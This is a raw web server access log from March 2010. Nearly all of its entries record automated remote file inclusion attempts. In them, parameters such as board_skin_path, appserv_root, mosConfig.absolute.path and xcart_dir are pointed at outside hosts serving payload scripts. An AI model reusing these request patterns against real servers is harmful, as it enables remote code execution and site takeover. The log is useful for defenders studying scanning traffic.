78.110.50.120 - - [03/Mar/2010:12:17:52 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:17:52 -0800] "GET /logs//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:17:53 -0800] "GET /appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:17:53 -0800] "GET /logs//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:17:53 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:12:17:54 -0800] "GET /logs/access_100214.log//main.php?sayfa=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:21:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:21:44 -0800] "GET /appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:21:44 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:12:22:35 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:24:13 -0800] "GET /logs/access_100226.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:24:13 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:24:14 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:24:34 -0800] "GET /logs/access_100221.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:25:03 -0800] "GET /logs/access_100226.log/?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:25:03 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:25:03 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:25:45 -0800] "GET /logs/access_100221.log/?_SERVER[DOCUMENT_ROOT]=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:27:14 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:27:14 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:27:14 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:27:30 -0800] "GET /logs/access_100214.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:29:58 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:29:58 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:29:58 -0800] "GET /logs/access_100206.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:30:03 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:30:03 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:30:03 -0800] "GET /logs/access_100206.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:07 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:07 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:07 -0800] "GET /logs/access_100206.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:23 -0800] "GET /logs/access_100206.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:23 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:23 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:46 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:46 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:46 -0800] "GET /logs/access_100206.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:49 -0800] "GET /logs/access_100202.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:31:59 -0800] "GET /logs/access_100202.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:15 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:15 -0800] "GET /logs/access_100206.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:15 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:24 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:24 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:24 -0800] "GET /logs/access_100206.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:29 -0800] "GET /logs/access_100206.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:29 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:29 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:32:54 -0800] "GET /logs/access_100202.log//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:33:14 -0800] "GET /logs/access_100206.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:33:14 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:33:14 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:33:43 -0800] "GET /logs/access_100206.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:33:43 -0800] "GET /shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:33:43 -0800] "GET /logs//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:12:33:58 -0800] "GET /logs/access_100130.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:12:34:00 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_100130.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:12:34:01 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_100130.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:34:47 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:34:47 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:34:47 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:12:35:03 -0800] "GET /logs/access_100214.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:35:47 -0800] "GET /logs/access_100213.log//write_update.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:35:47 -0800] "GET /write_update.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:35:47 -0800] "GET /logs//write_update.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [03/Mar/2010:12:36:58 -0800] "GET /logs/index.php?menu=deti&page=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [03/Mar/2010:12:36:58 -0800] "GET /logs/access_091217.log/index.php?menu=deti&page=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.138.158.46 - - [03/Mar/2010:12:36:58 -0800] "GET /index.php?menu=deti&page=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:37:42 -0800] "GET /logs/access_100202.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:39:06 -0800] "GET /logs/access_100202.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:39:43 -0800] "GET /logs/access_100206.log/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:40:09 -0800] "GET /logs/access_100202.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:40:28 -0800] "GET /logs/access_100202.log%20%20//shop///bbs//delete_comment.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:40:58 -0800] "GET /logs/access_100202.log/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:41:56 -0800] "GET /logs/access_100128.log%20%20//bbs/write_update.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:41:56 -0800] "GET /bbs/write_update.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:41:56 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:42:17 -0800] "GET /admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:42:19 -0800] "GET /admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:42:19 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:42:19 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:42:20 -0800] "GET //appserv/main.php?=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:42:20 -0800] "GET /logs///appserv/main.php?=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:42:21 -0800] "GET /logs/access_100220.log%20%20///appserv/main.php?=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:12:42:26 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [03/Mar/2010:12:42:36 -0800] "GET /logs/access_100201.log%20%20///appserv/main.php?=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:43:02 -0800] "GET /delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:43:02 -0800] "GET /logs//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:43:02 -0800] "GET /logs/access_100220.log%20%20//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:43:02 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:43:11 -0800] "GET /admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:43:11 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:43:11 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:12:43:13 -0800] "GET /index.php?side=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:43:44 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:12:44:05 -0800] "GET /logs//admin/auth.php?xcart_dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:12:44:05 -0800] "GET /admin/auth.php?xcart_dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:12:44:05 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:44:09 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:44:09 -0800] "GET /admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:44:09 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:44:09 -0800] "GET /logs/access_100206.log/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.190.41.101 - - [03/Mar/2010:12:44:31 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:12:44:43 -0800] "GET /logs//admin/auth.php?xcart_dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:12:44:43 -0800] "GET /admin/auth.php?xcart_dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [03/Mar/2010:12:44:43 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:45:03 -0800] "GET /logs/access_100206.log/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:45:13 -0800] "GET /logs/access_100202.log/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [03/Mar/2010:12:45:55 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://fogfacts.com/facts//nucleus/xmlrpc/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [03/Mar/2010:12:45:58 -0800] "GET /logs/access_100202.log/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:45:59 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:45:59 -0800] "GET /admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:45:59 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:46:15 -0800] "GET /admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:46:15 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:12:46:15 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [03/Mar/2010:12:46:35 -0800] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
61.47.7.71 - - [03/Mar/2010:12:48:28 -0800] "GET /logs/access_100220.log//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
